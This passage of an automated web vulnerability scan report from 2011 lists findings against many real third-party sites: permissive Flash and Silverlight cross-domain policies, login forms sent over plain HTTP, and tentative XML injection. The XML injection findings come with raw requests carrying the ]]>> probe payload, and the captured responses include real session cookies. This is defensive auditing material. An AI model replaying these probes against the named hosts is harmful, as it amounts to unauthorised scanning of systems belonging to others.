GET /crossdomain.xml HTTP/1.0
Host: support.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: TLTSID=37A49F687C31107C04C5A75B3A5FEB23; Path=/; Domain=.sprint.com
Set-Cookie: Apache=173.193.214.243.1305161164990996; path=/
Last-Modified: Thu, 13 May 2010 20:15:53 GMT
Accept-Ranges: bytes
Content-Length: 313
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...

4.21. http://w.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Thu, 12 May 2011 01:07:14 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.22. http://www.awltovhc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.awltovhc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Thu, 12 May 2011 00:05:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

4.23. http://www.dslreports.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dslreports.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 00:45:47 GMT
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 07 May 2008 23:58:53 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.targetscope.com" />
<allow-access-from domain="www.broadbandreports.com" />
<allow-access-from domain="www.dslreports.com" />
<allow-access-from domain="dev.dslreports.com" />
<allow-access-from domain="www.aggiejy.com" />
<allow-access-from domain="216.254.95.41" />
<allow-access-from domain="*.catt.com" />
...[SNIP]...

4.24. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.151.61
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.25. http://www.nanpa.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:57 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.26. http://www.stumbleupon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:33 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:46:54 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

4.27. http://anpisolutions.app4.hubspot.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://anpisolutions.app4.hubspot.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: anpisolutions.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 00:46:22 GMT
Connection: close
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.28. http://i.dslr.net/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.dslr.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dslr.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1321405504"
Last-Modified: Wed, 13 Jun 2007 02:10:02 GMT
Content-Length: 239
Connection: close
Date: Thu, 12 May 2011 00:45:55 GMT
Server: lighttpd/1.4.28

<cross-domain-policy>
<allow-access-from domain="www.broadbandreports.com"/>
<allow-access-from domain="www.dslreports.com"/>
<allow-access-from domain="dev.dslreports.com"/>
<allow-access-from domain
...[SNIP]...

4.29. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305161343531352; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 12 May 2011 01:19:03 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.30. http://www.vonage.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
Last-Modified: Thu, 21 Feb 2008 11:50:31 GMT
ETag: "2046e4-bf-446a9b66f2fc0"
Accept-Ranges: bytes
Content-Length: 191
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="www.vonage-media.co.uk" />
<allow-access-from domain="vonage-media.co.uk" />
</cross-domain-policy>

5. Silverlight cross-domain policy previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://metrics.connectedplanetonline.com/clientaccesspolicy.xml
http://metrics.sprint.com/clientaccesspolicy.xml
http://metrics.vonage.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.3. http://metrics.connectedplanetonline.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www70
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.sprint.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www138
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://metrics.vonage.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www19
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6. Cleartext submission of password previous next
There are 2 instances of this issue:

http://forum.link2voip.com/favicon.ico
http://www.secviz.org/node/89

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://forum.link2voip.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.link2voip.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.link2voip.com/ucp.php?mode=login

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_82ha5_u=1; phpbb3_82ha5_k=; phpbb3_82ha5_sid=c8a27ebe829b8494c7b1d53ed606faba

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:01 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 39662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />
<form method="post" action="./ucp.php?mode=login">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />  <span class="gensmall">
...[SNIP]...

6.2. http://www.secviz.org/node/89 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.secviz.org/content/the-davix-live-cd?destination=node%2F89

The form contains the following password field:

pass

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
<div class="content">
<form action="/content/the-davix-live-cd?destination=node%2F89" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7. XML injection previous next
There are 6 instances of this issue:

http://api.facebook.com/restserver.php [format parameter]
http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1]
http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2]
http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3]
http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1]
http://www.nanpa.org/forums/external.php [type parameter]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

7.1. http://api.facebook.com/restserver.php [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 11 May 2011 17:53:11 -0700
Pragma:
X-FB-Rev: 377111
X-FB-Server: 10.42.16.39
X-Cnection: close
Date: Thu, 12 May 2011 00:51:11 GMT
Content-Length: 916

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

7.2. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://images.smartname.com
Path:	/smartname/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname]]>>/images/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:13 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.3. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://images.smartname.com
Path:	/smartname/images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images]]>>/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:15 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.4. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://images.smartname.com
Path:	/smartname/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images/favicon.ico]]>> HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Expires: Thu, 12 May 2011 00:43:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:43:16 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.5. http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://mobilitypoint.westcon.com
Path:	/favicon.ico

Issue detail

Request

GET /favicon.ico]]>> HTTP/1.1
Host: mobilitypoint.westcon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:11:56 GMT
Server: Apache/2.2.8 (EL)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1029

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

7.6. http://www.nanpa.org/forums/external.php [type parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The type parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the type parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /forums/external.php?type=js]]>> HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:10 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158650; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Cache-Control: max-age=1305160149
Pragma: private
X-UA-Compatible: IE=7
Expires: Thu, 12 May 2011 00:29:09 GMT
Last-Modified: Wed, 11 May 2011 23:29:09 GMT
ETag: "5ad4bc554cc5b569cc359626e1477d12"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/xml; charset=ISO-8859-1
Content-Length: 30699

<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>NANPA - Natu
...[SNIP]...

8. SSL cookie without secure flag set previous next
There are 15 instances of this issue:

https://catalyst.fastcatalog.net/
https://lnp.activationnow.com/lnp/
